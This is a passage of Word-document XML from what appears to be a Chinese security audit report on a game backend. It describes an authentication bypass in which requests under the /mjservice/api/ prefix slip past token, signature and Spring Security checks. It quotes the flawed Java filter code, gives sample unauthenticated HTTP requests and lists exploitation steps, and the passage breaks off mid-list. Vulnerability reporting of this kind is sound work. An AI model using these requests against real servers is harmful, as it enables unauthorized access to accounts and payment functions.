        </w:rPr>
        <w:t>SIGN_TEST_PATTERNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 白名单全部基于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/xxx/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 前缀书写，对 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 同样完全不覆盖。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>三层安全组件的放行规则存在系统性不一致：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3180"/>
        <w:gridCol w:w="3180"/>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组件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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/api/**</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="318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/mjservice/api/**</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:b w:val="true"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 路径</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Spring Security </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
                <w:shd w:fill="EFF0F1"/>
              </w:rPr>
              <w:t>PERMIT_MATCHER</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放行 ✓</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放行 ✓</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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SignAuthTestFilter</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> 签名校验</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拦截校验</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静默跳过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ✗</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="19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TokenAuthFilter</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Token 鉴权</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拦截校验</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静默跳过</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ✗</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">最终效果：任何经由 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 前缀访问的控制器端点，均可绕过 Bearer Token 认证与请求签名验证，以匿名身份直接到达业务逻辑层。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="56"/>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57"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击者发送请求 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /mjservice/api/user/xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（无 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 头）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="58"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SignAuthTestFilter.shouldNotFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>normalizePath</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/user/xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，不匹配 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SIGN_TEST_PATTERNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（全为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/xxx/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），</w:t>
      </w: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 xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>签名过滤器被跳过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>TokenAuthFilter.shouldNotFilter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isNoTokenPath("/mjservice/api/user/xxx")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 判断路径不以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/api/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 开头，直接返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Token 过滤器被跳过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>SecurityConfig.PERMIT_MATCHER</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isPermitPath("/mjservice/api/user/xxx")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 命中 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>normalizedPath.startsWith("/mjservice/api/")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Spring Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>放行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求无鉴权到达 Controller，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>request.getAttribute("userId")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 返回 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（TokenAuthFilter 未执行注入），业务层以匿名/空身份执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="6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：若游戏内充值、提现、积分操作、排行奖励等接口在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/**</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 下存在映射，攻击者可在未登录状态下任意触发，影响资金安全和账户数据完整性。</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安全放行规则：SecurityConfig.java — isPermitPath</w:t>
              <w:br/>
              <w:t>private static boolean isPermitPath(String normalizedPath) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (normalizedPath.startsWith("/ws/")</w:t>
              <w:br/>
              <w:t xml:space="preserve">            || normalizedPath.startsWith("/api/")</w:t>
              <w:br/>
              <w:t xml:space="preserve">            || normalizedPath.startsWith("/mjservice/api/")) return true;  // ← /mjservice/api/** 被 Spring Security 放行</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ② Spring Security 放行匹配器：SecurityConfig.java — PERMIT_MATCHER</w:t>
              <w:br/>
              <w:t>private static final RequestMatcher PERMIT_MATCHER = (HttpServletRequest request) -&gt; {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String decodedPath = URL_PATH_HELPER.getPathWithinApplication(request);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (decodedPath == null) decodedPath = "";</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (containsPathTraversal(decodedPath)) return false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String normalizedPath = getNormalizedPath(request);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return isPermitPath(normalizedPath);  // ← /mjservice/api/** 返回 true，Spring Security 直接放行</w:t>
              <w:br/>
              <w:t>};</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ Token 鉴权跳过判断：TokenAuthFilter.java — isNoTokenPath</w:t>
              <w:br/>
              <w:t>private static boolean isNoTokenPath(String normalizedPath) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (!normalizedPath.startsWith("/api/")) return true;  // ← /mjservice/api/** 不以 /api/ 开头，直接跳过认证！污点：任何 /mjservice/api/** 请求均命中此分支</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (String pattern : NO_TOKEN_PATTERNS) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (ANT_PATH_MATCHER.match(pattern, normalizedPath)) return true;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return false;</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ④ shouldNotFilter 返回 true → TokenAuthFilter 不执行</w:t>
              <w:br/>
              <w:t>@Override</w:t>
              <w:br/>
              <w:t>protected boolean shouldNotFilter(HttpServletRequest request) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String decodedPath = URL_PATH_HELPER.getPathWithinApplication(request);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (StrUtil.isBlank(decodedPath)) decodedPath = "";</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    if (containsPath</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Traversal(decodedPath)) return false;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    String normalizedPath = getNormalizedPath(request);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    return isNoTokenPath(normalizedPath);  // ← /mjservice/api/** 返回 true，过滤器完全跳过，userId 不被注入</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ⑤ 签名过滤器同样跳过：SignAuthTestFilter.java — shouldNotFilter</w:t>
              <w:br/>
              <w:t>// SIGN_TEST_PATTERNS 仅包含 /api/xxx/** 前缀，无 /mjservice/api/**</w:t>
              <w:br/>
              <w:t>private static final String[] SIGN_TEST_PATTERNS = {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "/api/accelerator/**","/api/game/**","/api/home","/api/marquee/**",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "/api/miner/**","/api/fragment/**","/api/offline/**",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "/api/power/**","/api/priz/**","/api/ranking/**",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "/api/resource/**","/api/share/**","/api/signIn/**","/api/prize/**",</w:t>
              <w:br/>
              <w:t xml:space="preserve">    "/api/slotUnlock/**","/api/task/**","/api/user/**","/api/enums/**","/api/levelReward/"</w:t>
              <w:br/>
              <w:t xml:space="preserve">    // ← /mjservice/api/** 完全不在此列表中，签名验证被跳过</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/mjservice/api/user/info HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>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/mjservice/api/task/complete HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;目标服务器&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"taskId": &lt;攻击者构造的值&gt;}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">注：无需携带 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Authorization: Bearer &lt;token&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 头，无需请求签名参数（</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sign</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>timestamp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>nonce</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利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">确认目标业务端点，例如已知存在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /api/user/info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 需要 Bearer Token；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="64"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">直接将路径前缀替换为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/mjservice/api/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，即发送 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>GET /mjservice/api/user/info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，不携带 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>Authorization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 头；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="65"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>观察响应：若返回业务数据而非 401，说明认证被绕过；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
